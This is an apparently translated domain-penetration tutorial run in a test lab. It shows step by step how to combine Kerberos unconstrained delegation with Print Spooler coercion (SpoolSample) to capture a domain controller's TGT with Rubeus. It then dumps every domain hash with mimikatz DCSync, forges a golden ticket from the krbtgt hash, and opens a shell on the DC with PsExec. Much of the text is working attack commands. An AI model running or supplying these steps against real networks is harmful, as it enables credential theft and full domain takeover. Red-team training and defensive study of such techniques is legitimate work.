foreword
Following the previous article -> Domain penetration - The principle and utilization of non-constrained delegation attack of delegation attack . In actual combat, it is rather tasteless for the administrator to actively connect to the simple non-constrained delegation. Therefore , unconstrained delegation + Spooler printer service can be used to force the specified host to connect.
Exploitation Principle: Windows打印系统远程协议 (MS-RPRN)An old but enabled by default method in Exploitation, in which a domain user can use a MS-RPRN RpcRemoteFindFirstPrinterChangeNotification(Ex)method to force any computer running the Spooler service to authenticate an attacker's chosen target via Kerberos or NTLM
Note: The splooer service is running by default
Attack process
- Domain: test.lab
- Domain controller: 192.168.10.2 win2012, account administrator, hostname DC
- Domain host: 192.168.10.5 win7, account yuwin7, host name admin-PC
The attacker controls a host account with unconstrained delegation enabled. When the domain controller opens the Print Spooler service, the attacker can actively request the domain controller to access the host server, and then obtain the TGT of the DC.
- Take down a host (host account) with Kerberos unconstrained delegation
- Find a DC running the Print Spooler service (autostart and System privilege by default)
- Use Rubeus monitor mode as administrator
Rubeus listening
Run Rubeus as a local administrator on win7
Rubeus.exe monitor /interval:1 /filteruser:DC$
# 我们可以用Rubeus来监听Event ID为4624事件,这样可以第一时间截取到域控的TGT
# /interval:1 设置监听间隔1秒
# /filteruser 监听对象为我们的域控,注意后面有个$,如果不设置监听对象就监听所有的TGT
复制代码
Use the print service to force the domain controller to authenticate to the local machine
Execute as follows
spoolsample.exe DC admin-PC
# 表示利用打印服务强制让域控机向admin-PC主机验证身份,这样我们的Rubeus就可以监听到TGS了
复制代码At this point Rubeus has received the TGT
Extract TGT
Let's first copy the base64 of the TGT monitored by Rubeus, where a newline is added to each line, we use this python script to remove the newline character of each line
data=""
for line in open('1.txt','r'):
data += line.strip('\n')
print(data)
with open("2.txt",'a') as f:
f.write(data)
print('保存完毕')
复制代码Then use it directly to go to
powershellnormalTGT
[IO.File]::WriteAllBytes("绝对路径\ticket.kirbi", [Convert]::FromBase64String("TGT"))
复制代码
Inject the TGT ticket into the current session and export the hash of all users in the domain controller
run mimikatz as a domain user
kerberos::ptt ticket.kirbi
lsadump::dcsync /domain:test.lab /all /csv
复制代码
Please note here that the TGT ticket we obtained here cannot be regarded as a golden ticket, because the authority we obtained is only the local management authority of the domain controller, so we cannot connect to the domain controller, but we can indeed obtain the hash of all users, so we can make real The golden ticket~
make golden notes
Since there is a krbtgt user and the user's hash or NTML value, you can use it to generate a golden ticket
- Get the sid of this account
Now execute whoami /user locally, note that the digits behind the account permissions are not needed
- make bills
mimikatz "kerberos::golden /domain:test.lab /sid:S-1-5-21-587556175-550635965-2643831430 /krbtgt:6412c19ffa5a50cd63fe27917ef83f54 /user:administrator /ticket:ntlm.kirbi" "exit"
复制代码
- Inject the ticket
mimikatz "kerberos::purge" "kerberos::ptt ntlm.kirbi"
You can now connect to the domain controller
We can also use psexecbounce directly shell, because the golden ticket is injected, so no username and password are required
PsExec64.exe \dc cmd -accepteula
复制代码